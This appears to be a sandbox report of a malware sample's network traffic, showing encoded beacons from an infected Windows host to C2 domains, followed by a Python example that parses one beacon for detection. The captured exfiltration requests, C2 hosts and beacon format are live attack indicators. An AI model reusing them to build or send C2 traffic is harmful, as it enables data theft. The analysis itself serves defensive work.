                                  Jul 17, 2024 19:00:18.322715044 CEST | 703 | OUT | POST /d3vb/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.ancuapengiu28.com
                                  Origin: http://www.ancuapengiu28.com
                                  Referer: http://www.ancuapengiu28.com/d3vb/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 209
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Ascii: zn6L=NBnw/TZ1lQBPsfa3rpaMtIA1Yn3jf3F3q2N6+oYIKRbas0HGWTbFyyfTLcDHUJtwHe60rcmpo9V3Ku66XT4l9UJJzj3lTu0WnYPxpMaMz57GhN8FvE8R1W7TXxUhgPLUQ89SDjbA4AB/pWw2GFC6RY/rt2UzzlMD315CVBXUj59PsElWw/U9oYoSN9S9XMVCfkLjU9uPZqwf
                                  Jul 17, 2024 19:00:19.258730888 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                  Connection: close
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 796
                                  date: Wed, 17 Jul 2024 17:00:19 GMT
                                  server: LiteSpeed
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  2 | 192.168.2.6 | 63896 | 172.96.191.69 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 17, 2024 19:00:20.893569946 CEST | 727 | OUT | POST /d3vb/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.ancuapengiu28.com
                                  Origin: http://www.ancuapengiu28.com
                                  Referer: http://www.ancuapengiu28.com/d3vb/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 233
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Ascii: zn6L=NBnw/TZ1lQBPt/K3tOOMroA2WH3jInFNq2J6+pMYKj/asV3GVWvFzyfTA8DGaptvHeHBrdapo9p3KuK6Xi46/EJPoz3jXu0WnYPxpN/Ez4TGm9sFvl8QrG7QfRUh3fLQQ89gDi2I4GF/pXA2CHq5eY/ynWVh+U1742UWSwOz4JhukSkMsMUe6IIQN/KPXsVodkzjGqioWeV8+sXeRahJEzjEMcTl0kSYOQ==
                                  Jul 17, 2024 19:00:21.843307018 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                  Connection: close
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 796
                                  date: Wed, 17 Jul 2024 17:00:21 GMT
                                  server: LiteSpeed
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  3 | 192.168.2.6 | 63897 | 172.96.191.69 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 17, 2024 19:00:23.461924076 CEST | 1740 | OUT | POST /d3vb/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.ancuapengiu28.com
                                  Origin: http://www.ancuapengiu28.com
                                  Referer: http://www.ancuapengiu28.com/d3vb/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 1245
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Ascii: zn6L= [TRUNCATED]
                                  Jul 17, 2024 19:00:24.415227890 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                  Connection: close
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 796
                                  date: Wed, 17 Jul 2024 17:00:24 GMT
                                  server: LiteSpeed
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  4 | 192.168.2.6 | 63898 | 172.96.191.69 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 17, 2024 19:00:26.031224012 CEST | 435 | OUT | GET /d3vb/?zn6L=ADPQ8lRoxSByg+mG86XNue8ofAjmBVNA7RwbiYYLDlrQv278ITvGwT6pBJPFcJ5Oe9Xpz76I5qFPHvmWTw5Y21ldoEnhDfgwrYz6sOCTt4XHqos0nmhmqCv1SSwJ5dTjY+t3Vmc=&BF=AP6PLVoH-l HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Host: www.ancuapengiu28.com
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Jul 17, 2024 19:00:26.999006033 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                  Connection: close
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 796
                                  date: Wed, 17 Jul 2024 17:00:26 GMT
                                  server: LiteSpeed
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  5 | 192.168.2.6 | 63899 | 13.248.169.48 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 17, 2024 19:00:32.101264000 CEST | 703 | OUT | POST /cf3x/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.techacademy.store
                                  Origin: http://www.techacademy.store
                                  Referer: http://www.techacademy.store/cf3x/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 209
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Ascii: zn6L=SjM0pICMFDbjN2kAaFldUqIfODsGgJNdxZvaGeQBUrd3twM4IBpGSi9M6fBc91maYtnhalSNWpFpzZCALyAVUTwKzL4+LcPxviTGauVqZaoTXBNOLmbgkpDI40Few8RwEjtJ5bgiD2aR5/jTx7BxJwxBkXwY9Wn+c9e1LdQrYf6XpLzI9lv+CSrpJ4mqe0YnDL2H3pPj7gmH


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  6 | 192.168.2.6 | 63900 | 13.248.169.48 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 17, 2024 19:00:35.154923916 CEST | 727 | OUT | POST /cf3x/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.techacademy.store
                                  Origin: http://www.techacademy.store
                                  Referer: http://www.techacademy.store/cf3x/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 233
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Ascii: zn6L=SjM0pICMFDbjC3UAbm9dB6IcNDsGrpNRxZjaGc8RU9N3qR84ZzBGVi9Mx/BdwVmFYtrTak+NWpRpzZSAKAoUUDwM+r44PcPxviTGauRTZawTXxdOKHbj4ZDL70Fe7cRrEjtR5e4ID0iR5+TTwoZ2QAxHq3x96kONEM62BOsXONKqs9yShWvdQCLrJ6+YeUYNBLOHl+DE0UDkVKd4Kz8A0RTNdvRrxCatUQ==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  7 | 192.168.2.6 | 63901 | 13.248.169.48 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 17, 2024 19:00:37.730490923 CEST | 1740 | OUT | POST /cf3x/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.techacademy.store
                                  Origin: http://www.techacademy.store
                                  Referer: http://www.techacademy.store/cf3x/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 1245
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Ascii: zn6L= [TRUNCATED]


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  8 | 192.168.2.6 | 63902 | 13.248.169.48 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 17, 2024 19:00:40.312082052 CEST | 435 | OUT | GET /cf3x/?zn6L=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=&BF=AP6PLVoH-l HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Host: www.techacademy.store
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Jul 17, 2024 19:00:40.776273012 CEST | 410 | IN | HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Wed, 17 Jul 2024 17:00:40 GMT
                                  Content-Type: text/html
                                  Content-Length: 270
                                  Connection: close
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?zn6L=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI=&BF=AP6PLVoH-l"}</script></head></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  9 | 192.168.2.6 | 63903 | 162.159.134.42 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 17, 2024 19:00:45.875765085 CEST | 703 | OUT | POST /qt04/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.goodneighbor.club
                                  Origin: http://www.goodneighbor.club
                                  Referer: http://www.goodneighbor.club/qt04/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 209
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Ascii: zn6L=Uh9FRj5RjEQrcWSvQxMEqbeRogmMk7U4nx0ZKhqO8uLCqJTCXBJF2CGGV5ss/6Ct7no25Ke1svWvBRmAgMqbYvyXY3hd5Gfg8PC/a+qUcivVDqVjEQYuyitQpsp94pTGTOEQs74aamRjJ6khWpsSeHsK87A7Sty+yYe6msSAA2KXH+bRj3rcQ8151jXBB29fNJRY8hQbdhZq


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  10 | 192.168.2.6 | 63904 | 162.159.134.42 | 80 | 5316 | C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 17, 2024 19:00:48.496813059 CEST | 727 | OUT | POST /qt04/ HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Accept-Encoding: gzip, deflate, br
                                  Host: www.goodneighbor.club
                                  Origin: http://www.goodneighbor.club
                                  Referer: http://www.goodneighbor.club/qt04/
                                  Cache-Control: no-cache
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Content-Length: 233
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Data Ascii: zn6L=Uh9FRj5RjEQrOmivDWgE/LeQkAmMubU0nx4ZKgvV88/CqojCUAJFmSGGNpstgqC67nkU5Ly1ssqvBViAg7GYZ/yVAHhf3mfg8PC/a/OucmLVDaFjFxYtxitTgMp98pTCTOE5s/wkakZjJ/AhX8YVUHsQybBYVIrk9LXkt+2kdxKxPoaL/Er/CsV71hPzBW91PJpYu2c8SV8JjXoGvWgXLdpD3GHvL2G6pg==
                                  Jul 17, 2024 19:00:49.814909935 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Date: Wed, 17 Jul 2024 17:00:49 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  CF-Ray: 8a4bca56190a5e79-EWR
                                  CF-Cache-Status: DYNAMIC
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Content-Encoding: gzip
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Link: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"
                                  Vary: Accept-Encoding
                                  ki-cache-type: None
                                  Ki-CF-Cache-Status: BYPASS
                                  ki-edge: v=20.2.7;mv=3.0.6
                                  ki-origin: g1p
                                  X-Content-Type-Options: nosniff
                                  X-Edge-Location-Klb: 1
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxlNXrqfOuB%2BawULHB9tMokoe6PzNKmsLm2S6B%2BPVr1WB8HB2pQrPV1X2eV6fMyXy1wmKpJjzH8ZEmF6NGa%2FMShZouBlSXZEv3oIXDD%2FR6ivoejc11vdZpSItyxsiyVZpfs7%2BQ14TQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e 30 bd 18 45
                                  Data Ascii: 35568(}JI$SR^lK}\.Wg|8P"Mjt}}}7]2]=39@ h^/|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~0E
                                  Jul 17, 2024 19:00:49.814934015 CEST | 1236 bytes | IN | Data Raw: b1 f1 3c 5c 8e 1e 1f 71 81 bb 1a cd 8d 38 1a 45 69 d2 50 14 37 66 ee 37 3b 98 01 4e 7b 11 fb d8 a2 5e e8 c6 53 bf 61 1c 41 c1 64 1c 07 8b f4 c9 55 30 f7 a2 2b 67 78 35 76 8d 81 a1 bf 7d ff 6e 7c fa dc 7f 7c 24 00 ff af bb 59 cb 1a de 3c 41 9c 13
                                  Data Ascii: <\q8EiP7f7;N{^SaAdU0+gx5v}n||$Y<A?_4yHiMCG3g[$uZ^K$)G%w&OYUAS?)t$,a0v IrmB}`{8,{v}4#"y4$;2:Q*XKO`>M@TVMqh
                                  Jul 17, 2024 19:00:49.814984083 CEST | 1236 bytes | IN | Data Raw: 18 0d 1c 6e 9a 87 13 27 8d de d3 94 db 6c 1d 9a 90 f0 a9 30 0b 27 2d 6b a9 c1 58 0b ed e5 b3 f3 25 0a e6 4d 90 40 28 0b 9d 64 c2 0c 88 2c c7 2a 9b 30 82 ac 15 d2 d0 33 71 64 1e 7d 71 a1 41 3c 3e d6 38 bc 11 90 59 d1 ac 68 4b 33 6e 59 2b 74 17 7a
                                  Data Ascii: n'l0'-kX%M@(d,*03qd}qA<>8YhK3nY+tz0<g2<|m2<nQA`A-nA^.DI3v+4A~+p0|A't\y=BpwO@BP_u-nW}u-REB[M
                                  Jul 17, 2024 19:00:49.816356897 CEST | 1236 bytes | IN | Data Raw: 96 08 65 f2 10 98 bf 23 86 f1 32 46 81 dd b5 eb 1d ae cc f7 60 84 0a de 1e 1f 1f f7 a3 85 3b 06 5b ac d7 d9 b7 56 c1 81 bd 2b 2f 8b 86 52 d4 93 c9 8e 44 78 d7 e0 48 06 e3 7d 89 10 c5 6e da 06 59 7c 97 b6 9c b6 1f 3e f0 4f fb 6a a4 e5 e6 a2 7d 5b
                                  Data Ascii: e#2F`;[V+/RDxH}nY|>Oj}[@Me9sa`]F^]$r\Ui))1hAAML~,>Y"S?OQ{p4<kyvfOyr>B\igmPc"ax
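The POST to /qt04/ above is the sample's C2 beacon: one form field with a short random-looking name (zn6L), a raw base64 value, Origin and Referer pointing back at the C2 host itself, and a fixed Firefox 40 / Windows 7 User-Agent. The following Python is an added example written for this page (it is not Joe Sandbox code and not part of the report) that rebuilds the request body from the report's "Data Raw" hex line, splits the form field without letting a generic form parser corrupt it, and summarises the traits visible in the capture. The hex and header values are copied from the request above; the field-name and User-Agent checks are specific to this capture, not general FormBook rules, and the decoded 169-byte blob is left opaque because the report shows nothing about its encryption.

```python
"""
Added example: rebuild the POST /qt04/ body from the Joe Sandbox
"Data Raw" hex listing above and take the single form field apart safely.
"""
import base64
import binascii
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# "Data Raw" bytes of the POST above, copied from the report (10 bytes per
# line for readability). This is the report's data, not constructed.
DATA_RAW = """
7a 6e 36 4c 3d
55 68 39 46 52 6a 35 52 6a 45
51 72 4f 6d 69 76 44 57 67 45
2f 4c 65 51 6b 41 6d 4d 75 62
55 30 6e 78 34 5a 4b 67 76 56
38 38 2f 43 71 6f 6a 43 55 41
4a 46 6d 53 47 47 4e 70 73 74
67 71 43 36 37 6e 6b 55 35 4c
79 31 73 73 71 76 42 56 69 41
67 37 47 59 5a 2f 79 56 41 48
68 66 33 6d 66 67 38 50 43 2f
61 2f 4f 75 63 6d 4c 56 44 61
46 6a 46 78 59 74 78 69 74 54
67 4d 70 39 38 70 54 43 54 4f
45 35 73 2f 77 6b 61 6b 5a 6a
4a 2f 41 68 58 38 59 56 55 48
73 51 79 62 42 59 56 49 72 6b
39 4c 58 6b 74 2b 32 6b 64 78
4b 78 50 6f 61 4c 2f 45 72 2f
43 73 56 37 31 68 50 7a 42 57
39 31 50 4a 70 59 75 32 63 38
53 56 38 4a 6a 58 6f 47 76 57
67 58 4c 64 70 44 33 47 48 76
4c 32 47 36 70 67 3d 3d
"""

# Request line and the headers that matter, as shown in the capture above.
REQUEST = {
    "method": "POST",
    "path": "/qt04/",
    "Host": "www.goodneighbor.club",
    "Origin": "http://www.goodneighbor.club",
    "Referer": "http://www.goodneighbor.club/qt04/",
    "Content-Type": "application/x-www-form-urlencoded",
    "Content-Length": "233",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
}


def decode_data_raw(hex_dump: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw' hex listing back into the wire bytes."""
    return bytes.fromhex("".join(hex_dump.split()))


def split_single_field(body: bytes) -> tuple:
    """Split 'key=value' at the first '=' only.

    Deliberately not urllib.parse.parse_qs: the value is raw base64 that
    carries '+', '/' and '=' unescaped, and parse_qs would turn the '+'
    into a space and corrupt the blob.
    """
    key, _, value = body.decode("ascii").partition("=")
    return key, value


def decode_b64_strict(value: str) -> Optional[bytes]:
    """Base64-decode with alphabet validation; None if the text is not clean base64."""
    try:
        return base64.b64decode(value, validate=True)
    except binascii.Error:
        return None


def naive_parse_qs_value(body: bytes) -> str:
    """What a generic form parser hands you for the same body (the '+' becomes ' ')."""
    return parse_qs(body.decode("ascii"))["zn6L"][0]


def summarize(request: dict, body: bytes) -> dict:
    """Collect the traits of this beacon that are visible in the capture."""
    key, value = split_single_field(body)
    blob = decode_b64_strict(value)
    origin_host = urlsplit(request["Origin"]).hostname
    return {
        "body_matches_content_length": len(body) == int(request["Content-Length"]),
        "field_name": key,
        "field_count": body.count(b"&") + 1,
        "field_b64_valid": blob is not None,
        "decoded_len": len(blob) if blob else 0,
        # Origin/Referer point at the C2 host and path itself, not at any
        # page a real browser would have been on before submitting a form.
        "self_referential_origin": origin_host == request["Host"]
        and request["Referer"] == request["Origin"] + request["path"],
        # Fixed legacy UA as sent by this sample (capture-specific check).
        "legacy_firefox_ua": "Firefox/40.0" in request["User-Agent"],
    }


if __name__ == "__main__":
    body = decode_data_raw(DATA_RAW)
    for name, val in summarize(REQUEST, body).items():
        print(f"{name}: {val}")
    print("parse_qs would give:", repr(naive_parse_qs_value(body)[:40]), "...")
```

The strict decode is the point worth keeping: run the same body through parse_qs and the "+" in "9LXkt+2kdx" becomes a space, so a validating base64 decoder rejects the field and a lenient one silently drops a character and returns the wrong bytes. When writing a decoder or detection rule for this traffic, split on the first "=" yourself and validate the alphabet before decoding.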